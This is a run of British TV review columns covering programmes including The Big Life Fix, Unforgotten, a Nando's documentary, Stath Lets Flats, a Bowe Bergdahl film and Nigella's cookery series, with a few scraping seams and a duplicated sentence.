What irked her on a daily basis was that she was at completely the wrong height to see the TV screen. Inventing The Impossible: The Big Life Fix (BBC2) is, in a way, a tad mislabelled. It doesn’t fix people’s lives. It does, however, fix details of them, in such a way that the effects are enormous. It’s a very clever TV show in that respect, combining a bit of design tech with a challenge, a human story and something to ponder on afterwards. Although the challenges posed by last night’s missions were complex, the wishes at the root of them were the sort of thing you’d never give a thought to unless, for some reason, they weren’t being granted. Bobby wanted to be able to follow a conversation. Pollyanna wanted to be able to stand on her tiptoes. Tobijah wanted to cook with his daughter. Unlike certain ‘life-fix’ shows, where the expert descends, dispenses some advice and we fade out to a shot of the dysfunctional family enjoying a kickabout in the park, this one didn’t pretend it was easy. Akram, the genius helping Bobby, had distilled all manner of Nasalevel technology into the speechtext software but it took a focus group of deaf people to ask the awkward questions. If you’re staring at a screen during a conversation and you’re deaf, how will you know who is speaking and who isn’t? It was the same with the wonder-glove designed by Zoe for Tobijah, stellar engineering stymied, nearly, by voice recognition gremlins. It all worked out fine, of course, and left everyone with a happy glow but it was interesting to see how the designers carried it off. Zoe’s response was to thank Tobijah and his wife. The shy, likeable young Akram was in tears while Bobby and wife Linda rejoiced in the new software. It underlined what Zoe said earlier in the programme. Design isn’t about designing things, it’s about changing lives. The Prosecutors (BBC2) had a similar glow of satisfaction at the end of last night. Back with Senior Crown Prosecutor Eran Cutliffe and her West Midlands team, the programme followed an investigation into modern slavery, centred on nail bars throughout the Midlands. Key witnesses, all girls and young women from Vietnam, seemed to emerge and vanish as if magic was at work, while no test on earth could prove how old some of them really were. They all stuck rigidly to one story, too, saying they’d arrived here and been taken in by kindly compatriots, who fed and clothed them in exchange for work. It was up to Eran and co to hunt for the hints and the asides, the clues that suggested there was no element of choice. Close to the verdict, she discreetly explained some of her background, partially sighted until a hit-and-run accident as a child rendered her blind. It seemed an admirable way to present this life detail, not a mission statement at the start, not some back story continually referred to. We saw the woman and her work long before we learnt about the past. If it was a reason for Eran being passionate about justice, it was one among many. Hailing as he does from a country whose president is promising to build a wall to keep out the Mexicans, comedian Reginald has his concerns about borders and for a professional funnyman, he was pretty serious about them in this programme. Perhaps it’s time for that, it’s certainly time to stop laughing when a world leader describes the people from the country next door as being like vermin. Rather than dwelling on the terrible Mr Trump too long, Reginald’s mission was more to prove how false the idea of borders always was, using music as his launchpoint. In El Paso, Texas, he met up with a band who played a kind of Mexican music called cumbia that was, itself, not Mexican. It had come from Colombia, combining African drums with the flutes of the indigenous Indians. Crossing again into Lone Star, Texas, it had taken on a new form and probably had several others in its future. Elsewhere in the state, cajunto music cobbled in the polka rhythms and accordion sounds of German settlers, creating a tradition that was neither one thing or another, a little bit oompah and a little bit sombrero but certainly not done justice by labels such as Latin or Mexican or even Tex-Mex. Even town planners made the point in their own way. In California there’s a place called Calexia, and symmetrically opposite over the border in Mexico, a twin town called Mexical. California, Reg discovered, had the first border fence in 1909, but its purpose was just to stop Mexican cows from wandering over. That might be the only kind of fence that makes sense. Just after we took the motorway exit for home we’d drive past a vast, overgrown roundabout where my dad would always muse about the outlaws hiding out there. “If there aren’t any, then I bet there’s a dead body or two,” he would say. I’m not sure where he got this grisly idea but it seems someone else had it too as Unforgotten (ITV) began a third series with a pile of bones under the central reservation of a motorway. I was wondering how come a bloke digging up the M1 would have had such a keen eye for the shape of a human pelvis, but they explained that pretty swiftly by telling us he used to be a doctor in Iraq. It unfurled into quite a global story what with the arm bones having a titanium plate that could only have come from Cyprus in the midNineties, narrowing down the trail to one girl who broke an arm on holiday, aged 13, then vanished from her UK home three years later. With Nicola Walker and Sanjeev Bhaskar as the slightly odd, slightly mismatched (but not too much) cold case detective duo, this series somehow manages to be bleak without ever losing its heart. As DCI Cassie Stuart (Walker) rallied her troops to start ringing everyone who’d lost a teenaged daughter in the mid-Nineties, a shiver passed through the room. A montage of the phone calls, harrowing and sad, reminded us what losing someone really means and that solving puzzles is only one part of a murder detective’s job. This was sound advice since I never got ill and I never went near the sickly looking bloke who sold spicy chicken wings from a cart on the street corner. If his chicken was iffy, the opposite ought to be said of the high-street chain featured in Nando’s: A Peri Peri Big Success (Channel 5). The peppery chicken joint that came to us via South Africa, Mozambique and Portugal seems to inspire loyalty and affection like no other. We met people who had made a point of visiting as many branches of Nando’s as they could, who had studied the history of the chain from its first Johannesburg branch to the fonts and colours of its late-Nineties menus. We encountered well-known individuals who, despite their many achievements, were clearly only going to die happy if they received one of the famed, perhaps mythical, Nando’s black cards. Whatever else might be said about all these people and their peculiar passion for a restaurant chain, it was obvious they ate a lot of chicken and that they looked pretty well on it. They in themselves were an advert for Nando’s and, if last night’s documentary was to be believed, the chain has always had a canny way of advertising without paying the ad agencies. With its good luck tweets to the kids during GCSE season and its endorsements by today’s pop stars, Nando’s knows how to talk to the right people. With its good luck tweets to the kids during GCSE season and its endorsements by today’s pop stars, Nando’s knows how to talk to the right people. It also knows how to seem laid-back and cool while actually being devilishly clever. Before last night I would never thought of what genius lay behind the idea of getting the punters to pay before they had eaten. No bickering over the bill. No waiting for the bill. On a psychological level, no bitter taste of parting with cash after your nice chicken supper either. Similarly pleasing to the soul, apparently, is the way the vast menu lets you personalise your dining choices. You feel like that is your chicken wrap and no one else’s – an important selling point in a mass-produced world. We should also be grateful that the hot chicken chain landed on our shores – Ealing to be precise – because the founders had no particular loyalty to Britain. They were just looking to expand into a country whose people enjoyed eating chicken, spice and spoke English. They could have gone to India and left us with Spudulike. Who Killed Sharon Birchwood: Police Tapes (ITV) told a similarly global but considerably less pleasant story, linking a pretty Surrey village to the underworld sleaze of Pattaya in Thailand. With interviews and access to the original police recordings, this documentary allowed us to see, as if in real time, a distressed witness turning into a suspect. One of the detectives pointed out the difference in body language between the moments when Graham Birchwood was telling the truth about his ex-wife Sharon’s death and when he was lying. It seemed so obvious from that point on, you wondered how anyone ever got away with anything. Rich Hall’s Working For The American Dream (BBC4) was one of many descriptions of the religious, non-religious life of Uncle Sam, focusing, as the title suggested, on their founding myth. Forget nutshells, you can sum up the American Dream in a word and that word is “bootstraps”. Most people lack bootstraps nowadays but everybody gets the idea. You pull yourself up by them and if you’ve got grit or pluck or something like that, along with a capacity for hard, hard, very hard work, you could be Donald Trump one day – or ideally someone better. As gravel-voiced comic Rich pointed out last night, the American Dream is called a dream because one day you wake up and it isn’t true. Plenty of people rise to the top without an ounce of pluck, just a bit of low cunning. Plenty of people, in America as elsewhere, work 16-hour days their whole lives without ever rising from the bottom of the heap. But maybe that’s not the point. Nobody ever argues that there might not really have been a bloke called Icarus who tried to fly, the point is what the story does for us. However, I was never sure Rich Hall got the point throughout 86 minutes of angry, gravel-voiced but admittedly funny ranting. He reminded me of a teenager who thinks he’s composed a great guitar riff then realises it’s from a Dire Straits song. Nothing Rich said, from the obvious untruthfulness of the American Dream to the idea’s Calvinist origins, to the way work was stripped of its dignity by industrialism, was at all original. Quite a bit of it had been said by Karl Marx before it had even happened. On the plus side, Rich said it in an hour and a bit and was amusing whereas Marx wrote three of the thickest, dullest books in human history. I once rented a little cupboard of a flat over a kebab shop. I looked around, heard the snatches of Turkish and Kurdish floating up from the yard at the back, smelt the warm bread and the charcoal and thought, “Yeah!” A fortnight later, sick of the smell of grilling meat and close to breaking point from all the sleepless nights, I realised I’d liked the idea of the flat, not the flat I fear it might be the same with Stath Lets Flats (C4), in which its comedian and creator Jamie Demetriou plays an ambitious but hopeless LondonGreek lettings agent, forever stymied by the dad he works for, his sister and the hand of fate. It’s a great scenario; you could imagine it making a clever book or a decent comedy drama. Transformed into sitcom though and it’s just one long sketch with its main man doing a screechy, hand-waving performance that’s all on one, long note. You’d like to be able to sympathise with Stath, the boss’s boy, clearly outshone by his colleagues and forced to drive his fag-smoking sister round putting up wooden signs. You’d like to be able to applaud Jamie Demetriou for telling a story about a distinct kind of job in a distinct place and family dynamics in a specific community. But instead of combining that insight and experience with comedy, he’s just plumped for plate-smashing and bouzouki music. Literally, in some cases.

Both Sean and Bowe were abducted by the Taliban, so Sean made a film about him
Unfortunately, many a freed prisoner finds new nightmares awaiting them when they return.
Coming Home: Bowe Bergdahl versus the United States (BBC4) was a film that many people could have made.
Few could have brought what director Sean Langan brought to it though.
Bergdahl, a young US soldier who walked away from his post and into the hands of the Taliban, endured five years as a hostage before his release in May 2014.
While making a film about the Taliban in 2008, Sean Langan was captured by the same network and held hostage for four months.
GETTY
Bowe was branded a ‘deserter’ and was thought to have been trained by the Taliban
Nine years on, Langan was plainly still struggling with his experiences and making a film about fellow-sufferer Bergdahl brought many painful memories to the surface.
It also meant that he had a unique slant on the story and more importantly, made him a trustworthy interviewer in the eyes of Bergdahl and his family.
They had reasons to be cautious, for no sooner had President Obama stood outside the White House with Bergdahl’s parents, and announced the soldier was on his way home, than the poison started to seep in.
Certain news networks, unsurprisingly those opposed to Obama’s policies, began to ask why a ‘deserter’ was being treated like a hero.
Fresh details emerged, claims that Bergdahl had converted to Islam, that he had become a jihadi, had been allowed to train with the Taliban and to carry a gun.
It was said that six US soldiers had died in the attempt to free him.
Donald Trump, then campaigning for office, called Bergdahl a dirty traitor, and said that he should be shot.
There was much to wonder about in Sean Langan’s reconstruction of the story.
It was clear for a start that there was a whole other story about Bergdahl’s troubled youth and his fractured relationships with his family, cautiously being skirted around.
It was also clear the US military had few doubts about Bergdahl’s integrity and wished to let him go free after he flew home.
That he ended up in a court martial, facing life imprisonment, had nothing to do with senior army investigators and just about everything to do with rent-a-ranters on the news networks.
It also had a lot to do with lies, simple, deliberate untruths, such as the one about the six soldiers dying, planted, in some cases by the Taliban, and in others, made up on American soil to suit the politicians.
In terms of frightening places to be, today’s America comes a close second to Afghanistan.

Nigella – At My Table (BBC2) marked a welcome return for the tv chef, whose new series celebrates the simple, lovely stuff you can knock up at home.
(Provided you have several different kinds of chili pepper in your cupboard, anyway).
There are, as last night reminded us, many things to love about Ms Lawson.
She chucks great handfuls of salt in everything (hooray!). She has no problem with frozen peas (double hooray!).
She even has one of those hell-cupboards full of rusty, greasy baking tins and waffle makers you bought on the internet late one night when tipsy (triple hooray with choc chips!)
She will, however, never convince me that the kitchen table is where the family should be spending all its together-time. Nor do chili, lime and salt belong on a melon. Sorry.
